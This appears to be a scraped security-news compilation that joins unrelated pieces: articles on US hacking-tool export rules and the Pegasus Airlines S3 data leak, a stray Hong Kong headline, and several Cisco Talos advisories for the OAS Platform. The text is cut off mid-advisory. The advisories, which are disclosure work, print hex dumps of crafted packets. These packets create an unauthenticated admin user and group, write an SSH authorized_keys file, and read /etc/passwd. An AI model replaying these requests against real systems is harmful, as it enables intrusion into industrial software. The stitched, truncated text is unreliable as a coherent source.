Government has sought to allay misgivings of cybersecurity industry

Government has sought to allay misgivings of cybersecurity industry

As concern mounts about the security risks posed by overseas hackers, the US Commerce Department’s Bureau of Industry and Security (BIS) has published revisions to its ban on certain cybersecurity exports.

The prohibition – first announced last October – effectively bans the export of hacking software and equipment to China, Russia, and a number of other countries without a license from the BIS.

**Disrupt, deny, degrade**

“These items warrant controls because these tools could be used for surveillance, espionage, or other actions that disrupt, deny or degrade the network or devices on it,” reads the new and final rule, published in the Federal Register and effective from May 26.

The export ban would therefore likely cover spyware such as Pegasus, developed by Israeli firm NSO Group and controversially used by authoritarian governments to surveil journalists, activists, politicians, and business executives.

RELATED Pegasus mobile spyware used zero-click exploits to snoop on Catalan politicians

The move brings the US into line with 42 other nations that are members of the Wassenaar Arrangement on Export Controls for Conventional Arms and Dual-Use Goods and Technologies.

An earlier version of the rule, published last year, introduced a new license exception for Authorized Cybersecurity Exports (ACE). This, included in response to cybersecurity industry concern, allowed the export, re-export, and in-country transfer of ‘cybersecurity items’ to most destinations.

As a result, under last year’s draft, it was agreed that a license would only be required for exports to countries where there are concerns about national security or weapons of mass destruction, as well as countries subject to a US arms embargo.

This final version, produced following a public consultation, includes some changes to this section. These include clarifying the definition of ‘government end user’, rewriting some of the text to make it clearer, and correcting wording that, says BIS, “inadvertently” widened the scope of exceptions.

**Strong opposition**

There had previously been strong opposition from the cybersecurity industry, worried that the controls covered too broad a range of tools and technologies, that the red tape involved would hamper the work of good-faith hackers and bug bounty hunters, and that the restrictions on the development of intrusion software would hold back international cybersecurity research.

“This rule is meant to be a framework to understand and deter the export of cyber capability – mostly exploits, but also potentially TTPs, IOCs, et cetera – to governments in Country Group D,” Casey Ellis, founder and CTO of Bugcrowd, tells The Daily Swig.

Read more of the latest hacking tools news and analysis

“Export control is difficult enough with physical weapons – cryptographic export controls have already illustrated the idea that regulating export in the cyber domain is difficult, and the implementation of the Wassenaar Agreement to include cyber in the USA has been no exception.”

**Compliance difficulties**

There are still some concerns about the rule, with a number of commenters on the draft suggesting that it presents compliance difficulties and isn't necessarily always clear – for example, on the question as to whether it would control cybersecurity incident detection and monitoring software.

BIS is attempting to deal with this through the regular publication of FAQs, and says it plans to provide more guidance over time.

“The good and clear thing here is that the BIS has listened to and actively worked to consider feedback from the security, research, and bounty hunter communities,” says Ellis.

“An important section to keep an eye on will be the scope of license requirements, which they’ve committed to outlining and maintaining through FAQs. These FAQs will ultimately dictate who is required to pursue licensing under the ruling, and who is carved out.”

RECOMMENDED US revises policy regarding Computer Fraud and Abuse Act, will not prosecute good faith research

US export ban on hacking tools tweaked after public consultation

By Waqas
Pegasus Airlines is a Turkey-based low-cost airline that exposed Electronic Flight Bag (EFB) data to the public including…
This is a post from HackRead.com Read the original post: Pegasus Airlines Leaked 6.5TB of Data in AWS S3 Bucket Mess Up

**Pegasus Airlines is a Turkey-based low-cost airline that exposed Electronic Flight Bag (EFB) data to the public including sensitive information such as source code, crew and staff data, and flight details.**

A team of security researchers at SafetyDetectives have shared details of an unprotected cloud data storage discovered on February 28th, 2022. The details of the incident have only been shared this week.

According to researchers, the data belonged to a low-cost domestic and international flight operator known as Pegasus Airlines. Part of the data leak is the personal information of the airline’s flight crew, source code, and flight data. The database was left open in an AWS S3 bucket.

**Details of Leaked Data**

In a blog post published by SafetyDetectives, around 23 million documents were stored in the unprotected AWS S3 bucket, which equated to about 6.5TB of data. The exposed data included more than 3 million sensitive flight data files, including flight charts/revisions, pre-flight checks-related issues’ details, insurance documents, and crew shift information.

Furthermore, more than 1.6 million files contained the airline crew’s PII (personally identifiable information). This included their photos and signatures.

**Pegasus Airlines’ EFB Software Leaked the Data**

Reportedly, parts of the leaked data were tracked to the EFB (Electronic Flight Bag) software. This software, PegasusEFB, is developed by Pegasus Airlines and acts as an information management tool for the airline. EFBs help optimize the crew’s productivity by offering vital reference materials for the flight.

According to the SafetyDetectives research team, the source code of the EFB software was also included in the exposed database, including secret keys and plain text passwords. Pilots use PegasusEFB for various functions like take-off/landing, aircraft navigation, refueling, safety procedures, and other in-flight operations.

Image 1: PegasusEFB’s admin panel – Image 2: .CSV files with flight and crew data – Image 3: Flight charts featuring navigation data – Image 4: Photo of one of the Pegasus Airline’s crew members (Images Provided by SafetyDetectives)

**Possible Dangers**

The data leak has jeopardized the safety and privacy of the Pegasus Airline’s crew members. Researchers noted that the leak would allow threat actors to access sensitive flight details. Organized crime groups can coerce crew members, and bad actors may identify security loopholes in the airline and airport security.

Cybercriminals can tamper with “sensitive flight data and extra-sensitive files using passwords and secret keys found on PegasusEFB bucket.” Though researchers further claimed that there’s no certainty that pilots would use this bucket’s files for future flights, their contents may block vital EFB data from reaching the airline staff and risk the passengers and crew members.

> “With millions of files containing recent and possibly relevant flight data, unfortunately, an attacker could have numerous options to cause harm if they found PegasusEFB’s bucket.”
> 
> SafetyDetectives Cybersecurity Team

SafetyDetectives researchers stated that at the moment, there’s no evidence threat actors detected the trove before they did. The team notified Pegasus Airlines on 1 March 2022, and three weeks later, the leak was remediated.

**More AWS S3 Bucket Mess Up**

*   Misconfigured AWS bucket exposed 421GB of Artwork Archive data
*   Unprotected S3 Cloud Bucket Exposed 100GB of Classified NSA Data
*   350 million email addresses exposed on misconfigured AWS S3 bucket
*   Amazon S3 Buckets Exposed US Military’s Social Media Spying Campaign
*   S3 bucket mess up exposed 182GB of senior US, and Canada citizens’ data

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Pegasus Airlines Leaked 6.5TB of Data in AWS S3 Bucket Mess Up

During the protests in Hong Kong, young people carried laser pointers, umbrellas, and plastic ties—objects that sometimes led to their arrest, and years of legal limbo.

‘How Are They Weapons? That’s Only a Flashlight!’

A file write vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A file write vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more. Configuration of the platform is possible through TCP/58727 by default.

By sending a series of properly-formatted configuration messages to the OAS Platform, it is possible to upload an arbitrary file to any location permissible by the underlying user. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Before the transfer of a file will be accepted, it is necessary that a Security Group with File Transfer permissions and a User Account in that group exist. Both the Security Group and the User Account referred to here are elements within the OAS Platform, not on the underlying Linux machine. If an acceptable Security Group and User Account already exist, the necessary credentials can be sniffed off the network and used for the transfer. If they do not exist, they would need to be created before exploitation would be possible.

Once the required Security Group and User Account credentials have been obtained, a file of choice can be uploaded to the underlying linux machine at any path permissible by the user owning the oas-engine service, through use of the SecureTransferFiles command accompanied with the newly created (or sniffed) credentials. A valid SecureTransferFiles command resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   02 b6 00 00 40 00 40 06 a2 4f c0 a8 0a 6a c0 a8   ....@.@..O...j..
    0020   0a 38 c4 ea e5 67 18 9e 24 8a 19 e0 9f df 80 18   .8...g..$.......
    0030   08 0a b5 4d 00 00 01 01 08 0a 36 5a a0 6d d6 19   ...M......6Z.m..
    0040   2e 41 00 00 00 00 00 d0 83 40 00 01 00 00 00 ff   .A.......@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13   ................
    0070   53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69   SecureTransferFi
    0080   6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00   les.............
    0090   00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c   .............Mal
    00a0   69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20   iciousUser..... 
    00b0   31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59   1MZJ2XTeAwi88+aY
    00c0   78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78   xbU07v+k4GWJiVPx
    00d0   09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07   ................
    00e0   00 00 00 10 07 00 00 00 04 00 00 00 08 08 01 00   ................
    00f0   00 00 06 08 00 00 00 13 2f 68 6f 6d 65 2f 6f 61   ......../home/oa
    0100   73 75 73 65 72 2f 2e 73 73 68 2f 06 09 00 00 00   suser/.ssh/.....
    

When a successful SecureTransferFiles command is received, a response similar to the following will be returned:

    0000   00 00 00 00 00 80 44 40 00 01 00 00 00 ff ff ff   ......D@........
    0010   ff 01 00 00 00 00 00 00 00 10 01 00 00 00 02 00   ................
    0020   00 00 06 02 00 00 00 07 53 75 63 63 65 73 73 0a   ........Success.
    0030   0b                                                .
    

With file upload functionality successful, various approaches can be taken to get access to the system. The proof-of-concept here uploads a new authorized_keys file to the oasuser’s .ssh directory, after which it is possible to gain access to the system via a ssh command like the following: ssh -i id_rsa oasuser@192.168.1.10

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Vendor Response**

released as version 16.00.0113

https://openautomationsoftware.com/downloads/

**Timeline**

2022-03-15 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26082: TALOS-2022-1493 || Cisco Talos Intelligence Group

An information disclosure vulnerability exists in the OAS Engine SecureBrowseFile functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted network request can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.

**Summary**

An information disclosure vulnerability exists in the OAS Engine SecureBrowseFile functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted network request can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a properly-formatted unauthenticated configuration message to the OAS Platform, it is possible to get a directory listing at any location permissible by the underlying user. By default this message can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions. When a SecureBrowseFile command is successfully processed, the response will contain the output of a command similar to ls. This will provide a response similar to the following:

    0000   00 00 00 00 00 b0 b1 40 00 01 00 00 00 ff ff ff   .......@........
    0010   ff 01 00 00 00 00 00 00 00 10 01 00 00 00 06 00   ................
    0020   00 00 06 02 00 00 00 07 53 75 63 63 65 73 73 0a   ........Success.
    0030   09 03 00 00 00 09 04 00 00 00 09 05 00 00 00 09   ................
    0040   06 00 00 00 11 03 00 00 00 89 00 00 00 06 07 00   ................
    0050   00 00 0c 2f 65 74 63 2f 67 74 6b 2d 32 2e 30 06   .../etc/gtk-2.0.
    0060   08 00 00 00 0f 2f 65 74 63 2f 6d 6f 64 70 72 6f   ...../etc/modpro
    0070   62 65 2e 64 06 09 00 00 00 0d 2f 65 74 63 2f 6c   be.d....../etc/l
    0080   6f 67 63 68 65 63 6b 06 0a 00 00 00 0a 2f 65 74   ogcheck....../et
    0090   63 2f 64 63 6f 6e 66 06 0b 00 00 00 08 2f 65 74   c/dconf....../et
    00a0   63 2f 76 69 6d 06 0c 00 00 00 0d 2f 65 74 63 2f   c/vim....../etc/
    00b0   73 79 73 63 74 6c 2e 64 06 0d 00 00 00 0a 2f 65   sysctl.d....../e
    00c0   74 63 2f 72 63 32 2e 64 06 0e 00 00 00 0f 2f 65   tc/rc2.d....../e
    00d0   74 63 2f 72 65 73 6f 6c 76 63 6f 6e 66 06 0f 00   tc/resolvconf...
    00e0   00 00 0e 2f 65 74 63 2f 77 69 72 65 73 68 61 72   .../etc/wireshar
    00f0   6b 06 10 00 00 00 0e 2f 65 74 63 2f 70 72 6f 66   k....../etc/prof
    0100   69 6c 65 2e 64 06 11 00 00 00 10 2f 65 74 63 2f   ile.d....../etc/
    

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-27169: TALOS-2022-1494 || Cisco Talos Intelligence Group

An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to arbitrary file read. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to arbitrary file read. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

4.9 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a series of properly-formatted configuration messages to the OAS Platform, it is possible to read an arbitrary file at any location permissible by the underlying user. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Before the transfer of a file will be accepted, it is necessary that a Security Group with File Transfer permissions and a User Account in that group exist. Both the Security Group and the User Account referred to here are elements within the OAS Platform, not on the underlying Linux machine. If an acceptable Security Group and User Account already exist, the necessary credentials can be sniffed off the network and used for the transfer. If they do not exist, they would need to be created before exploitation would be possible.

A valid SecureTransferFiles command resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   00 ff 00 00 40 00 40 06 a4 06 c0 a8 0a 6a c0 a8   ....@.@......j..
    0020   0a 38 c4 e4 e5 67 c9 f5 cd 34 94 6c 24 2e 80 18   .8...g...4.l$...
    0030   08 0a 21 f0 00 00 01 01 08 0a bb 15 e8 9d d6 18   ..!.............
    0040   2b 37 00 00 00 00 00 60 68 40 00 01 00 00 00 ff   +7.....`h@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13   ................
    0070   53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69   SecureTransferFi
    0080   6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00   les.............
    0090   00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c   .............Mal
    00a0   69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20   iciousUser..... 
    00b0   31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59   1MZJ2XTeAwi88+aY
    00c0   78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78   xbU07v+k4GWJiVPx
    00d0   09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07   ................
    00e0   00 00 00 10 07 00 00 00 03 00 00 00 08 08 02 00   ................
    00f0   00 00 06 08 00 00 00 03 6f 75 74 06 09 00 00 00   ........out.....
    0100   0b 2f 65 74 63 2f 70 61 73 73 77 64 0b            ./etc/passwd.
    

Once the required Security Group and User Account have been created, a file of choice can be read from the underlying linux machine at any path permissible by the user owning the oas-engine service, through use of the SecureTransferFiles command accompanied with the newly created (or sniffed) credentials. When a SecureTransferFiles command is successfully processed, the response will contain the contents of the requested file. This response resembles the following:

    0000   c4 b3 01 c3 ba c9 00 0c 29 5e b3 62 08 00 45 00   ........)^.b..E.
    0010   0a de 3b ca 40 00 40 06 5e 5d c0 a8 0a 38 c0 a8   ..;.@.@.^]...8..
    0020   0a 6a e5 67 c4 e4 94 6c 24 2e c9 f5 cd ff 80 18   .j.g...l$.......
    0030   01 fc a0 c3 00 00 01 01 08 0a d6 18 2b 3c bb 15   ............+<..
    0040   e8 9d 00 00 00 00 00 44 a5 40 00 01 00 00 00 ff   .......D.@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   02 00 00 00 06 02 00 00 00 07 53 75 63 63 65 73   ..........Succes
    0070   73 09 03 00 00 00 10 03 00 00 00 01 00 00 00 09   s...............
    0080   04 00 00 00 10 04 00 00 00 03 00 00 00 08 08 01   ................
    0090   00 00 00 06 05 00 00 00 0b 2f 65 74 63 2f 70 61   ........./etc/pa
    00a0   73 73 77 64 09 06 00 00 00 0f 06 00 00 00 38 0a   sswd..........8.
    00b0   00 00 02 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f   ...root:x:0:0:ro
    00c0   6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61   ot:/root:/bin/ba
    00d0   73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a   sh.daemon:x:1:1:
    00e0   64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e   daemon:/usr/sbin
    00f0   3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67   :/usr/sbin/nolog
    0100   69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e   in.bin:x:2:2:bin
    

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26067: TALOS-2022-1492 || Cisco Talos Intelligence Group

An external config control vulnerability exists in the OAS Engine SecureAddUser functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to the creation of an OAS user account. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An external config control vulnerability exists in the OAS Engine SecureAddUser functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to the creation of an OAS user account. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a series of properly-formatted unauthenticated configuration messages to the OAS Platform, it is possible to create a new OAS user account and apply a custom Security Group. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Some configuration commands such as SecureTransferFiles require an OAS User account in an authorized OAS Security Group with File Transfer permissions before they can be successfully processed. The default security group that gets applied to users does not include this File Transfer permission.

Through use of the SecureAddUser and SecureConfigValues commands it is possible to create a new OAS user account and subsequently apply the custom OAS Security Group, all from an unauthenticated context.

A SecureAddUser request resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   00 a2 00 00 40 00 40 06 a4 63 c0 a8 0a 6a c0 a8   ....@.@..c...j..
    0020   0a 38 ce 09 e5 67 06 47 5a 92 c6 ae 37 55 80 18   .8...g.GZ...7U..
    0030   08 0a d7 e1 00 00 01 01 08 0a 6f c6 1a 48 0b 46   ..........o..H.F
    0040   28 d2 00 00 00 00 00 80 59 40 00 01 00 00 00 ff   (.......Y@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 0d   ................
    0070   53 65 63 75 72 65 41 64 64 55 73 65 72 09 03 00   SecureAddUser...
    0080   00 00 10 03 00 00 00 04 00 00 00 08 08 01 00 00   ................
    0090   00 06 04 00 00 00 00 09 04 00 00 00 06 05 00 00   ................
    00a0   00 0d 4d 61 6c 69 63 69 6f 75 73 55 73 65 72 0b   ..MaliciousUser.
    

A SecureConfigValues request resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   01 f8 00 00 40 00 40 06 a3 0d c0 a8 0a 6a c0 a8   ....@.@......j..
    0020   0a 38 ce 0a e5 67 13 16 a1 df 95 4d 1c 9b 80 18   .8...g.....M....
    0030   08 0a 4d 9b 00 00 01 01 08 0a 5c 3f 31 9e 0b 46   ..M.......\?1..F
    0040   28 d5 00 00 00 00 00 c0 7b 40 00 01 00 00 00 ff   (.......{@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 12   ................
    0070   53 65 63 75 72 65 43 6f 6e 66 69 67 56 61 6c 75   SecureConfigValu
    0080   65 73 09 03 00 00 00 10 03 00 00 00 05 00 00 00   es..............
    0090   08 08 01 00 00 00 06 04 00 00 00 00 09 04 00 00   ................
    00a0   00 06 05 00 00 00 05 55 73 65 72 73 09 06 00 00   .......Users....
    00b0   00 0f 06 00 00 00 4a 01 00 00 02 00 01 00 00 00   ......J.........
    00c0   ff ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00   ................
    00d0   00 03 00 00 00 08 08 01 00 00 00 06 02 00 00 00   ................
    00e0   0d 53 65 74 50 72 6f 70 65 72 74 69 65 73 09 03   .SetProperties..
    00f0   00 00 00 10 03 00 00 00 03 00 00 00 06 04 00 00   ................
    0100   00 0d 4d 61 6c 69 63 69 6f 75 73 55 73 65 72 09   ..MaliciousUser.
    0110   05 00 00 00 09 06 00 00 00 11 05 00 00 00 09 00   ................
    0120   00 00 06 07 00 00 00 04 4e 61 6d 65 06 08 00 00   ........Name....
    0130   00 08 50 61 73 73 77 6f 72 64 06 09 00 00 00 0d   ..Password......
    0140   53 65 63 75 72 69 74 79 47 72 6f 75 70 06 0a 00   SecurityGroup...
    0150   00 00 14 41 63 74 69 76 65 44 69 72 65 63 74 6f   ...ActiveDirecto
    0160   72 79 47 72 6f 75 70 06 0b 00 00 00 17 41 63 74   ryGroup......Act
    0170   69 76 65 44 69 72 65 63 74 6f 72 79 50 72 69 6f   iveDirectoryPrio
    0180   72 69 74 79 06 0c 00 00 00 06 46 69 65 6c 64 31   rity......Field1
    0190   06 0d 00 00 00 06 46 69 65 6c 64 32 06 0e 00 00   ......Field2....
    01a0   00 06 46 69 65 6c 64 33 06 0f 00 00 00 06 46 69   ..Field3......Fi
    01b0   65 6c 64 34 10 06 00 00 00 09 00 00 00 09 04 00   eld4............
    01c0   00 00 06 11 00 00 00 08 70 61 73 73 77 6f 72 64   ........password
    01d0   06 12 00 00 00 0e 4d 61 6c 69 63 69 6f 75 73 47   ......MaliciousG
    01e0   72 6f 75 70 06 13 00 00 00 00 08 08 00 00 00 00   roup............
    01f0   09 13 00 00 00 09 13 00 00 00 09 13 00 00 00 09   ................
    0200   13 00 00 00 0b 0b                                 ......
    

When successfully processed, this will result in a new OAS user account in the specified Security Group, giving that user any permissions allowed by the group. This user can then be used to successfully make authenticated requests to the platform.

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26303: TALOS-2022-1488 || Cisco Talos Intelligence Group

An external config control vulnerability exists in the OAS Engine SecureAddSecurity functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to the creation of a custom Security Group. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An external config control vulnerability exists in the OAS Engine SecureAddSecurity functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to the creation of a custom Security Group. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a series of properly-formatted unauthenticated configuration messages to the OAS Platform, it is possible to create a custom OAS Security Group with File Transfer permissions. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Some configuration commands such as SecureTransferFiles require an OAS User account in an authorized OAS Security Group with File Transfer permissions before they can be successfully processed. The default security group that gets applied to users does not include this File Transfer permission.

Through use of the SecureAddSecurity and SecureConfigValues commands, it is possible to create a custom Security Group and subsequently apply the File Transfer permission, all from an unauthenticated context.

A SecureAddSecurity request resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   00 a7 00 00 40 00 40 06 a4 5e c0 a8 0a 6a c0 a8   ....@.@..^...j..
    0020   0a 38 cd ee e5 67 3f 04 a9 84 85 4d 0a f7 80 18   .8...g?....M....
    0030   08 0a ea 48 00 00 01 01 08 0a ac ad ae 7b 0b 3f   ...H.........{.?
    0040   44 f4 00 00 00 00 00 c0 5a 40 00 01 00 00 00 ff   D.......Z@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 11   ................
    0070   53 65 63 75 72 65 41 64 64 53 65 63 75 72 69 74   SecureAddSecurit
    0080   79 09 03 00 00 00 10 03 00 00 00 04 00 00 00 08   y...............
    0090   08 01 00 00 00 06 04 00 00 00 00 09 04 00 00 00   ................
    00a0   06 05 00 00 00 0e 4d 61 6c 69 63 69 6f 75 73 47   ......MaliciousG
    00b0   72 6f 75 70 0b                                    roup.
    

A SecureConfigValues request resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   12 c6 00 00 40 00 40 06 92 3f c0 a8 0a 6a c0 a8   ....@.@..?...j..
    0020   0a 38 cd ef e5 67 15 48 18 a7 c9 2d 7e ac 80 18   .8...g.H...-~...
    0030   08 0a a8 ab 00 00 01 01 08 0a 90 8a 32 06 0b 3f   ............2..?
    0040   45 06 00 00 00 00 00 8a b2 40 00 01 00 00 00 ff   E........@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 12   ................
    0070   53 65 63 75 72 65 43 6f 6e 66 69 67 56 61 6c 75   SecureConfigValu
    0080   65 73 09 03 00 00 00 10 03 00 00 00 05 00 00 00   es..............
    0090   08 08 01 00 00 00 06 04 00 00 00 00 09 04 00 00   ................
    00a0   00 06 05 00 00 00 08 53 65 63 75 72 69 74 79 09   .......Security.
    00b0   06 00 00 00 0f 06 00 00 00 15 12 00 00 02 00 01   ................
    00c0   00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 10   ................
    00d0   01 00 00 00 03 00 00 00 08 08 01 00 00 00 06 02   ................
    00e0   00 00 00 0d 53 65 74 50 72 6f 70 65 72 74 69 65   ....SetPropertie
    00f0   73 09 03 00 00 00 10 03 00 00 00 03 00 00 00 06   s...............
    0100   04 00 00 00 0e 4d 61 6c 69 63 69 6f 75 73 47 72   .....MaliciousGr
    0110   6f 75 70 09 05 00 00 00 09 06 00 00 00 11 05 00   oup.............
    

When successfully processed, this will result in a new Security Group that can be applied to any new or existing user, giving that user any permissions allowed by the group.

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Timeline**

2022-03-16 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26043: TALOS-2022-1489 || Cisco Talos Intelligence Group

A denial of service vulnerability exists in the OAS Engine SecureConfigValues functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted network request can lead to loss of communications. An attacker can send a network request to trigger this vulnerability.

**Summary**

